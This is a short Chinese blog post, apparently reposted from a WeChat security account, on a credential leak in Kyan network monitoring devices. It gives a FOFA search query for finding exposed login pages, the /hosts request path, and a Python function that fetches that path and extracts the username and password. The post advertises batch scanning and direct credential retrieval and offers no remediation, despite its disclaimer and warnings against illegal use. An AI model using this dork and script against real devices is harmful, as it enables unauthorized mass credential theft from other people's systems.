Kyan网络监控账号密码泄露

  • A+
所属分类:安全漏洞

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语法:

title="platform - Login"


POC:

http://url/hosts


脚本利用:

支持多个批量扫描、支持单个检测、支持直接获取账号密码

def poc(url):  target = url+"/hosts"  r = requests.get(url=target,timeout=5,verify=False)  if r.status_code==200 and "UserName" in r.text:    print(target+"  "+"漏洞存在!")    s = str(r.text)    match = re.findall(r'(?<=UserName=).[a-zA-z0-9_]*',s,re.I|re.M) #提取UserName右边的字符串    if match:      print("账号为: "+match[0])    else:      print("错误")    match1 = re.findall(r'(?<=Password=).*',s,re.I|re.M) #提取Password右边的字符串    if match1:      print("密码为: "+match1[0])    else:      print("错误")  else:    print(target+"    "+"漏洞不存在!")

利用截图:

Kyan网络监控账号密码泄露

脚本获取请回复:Kyan泄密


切勿用于非法测试!

切勿用于非法测试!

切勿用于非法测试!

本文始发于微信公众号(Fight Tigers Team):Kyan网络监控账号密码泄露

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: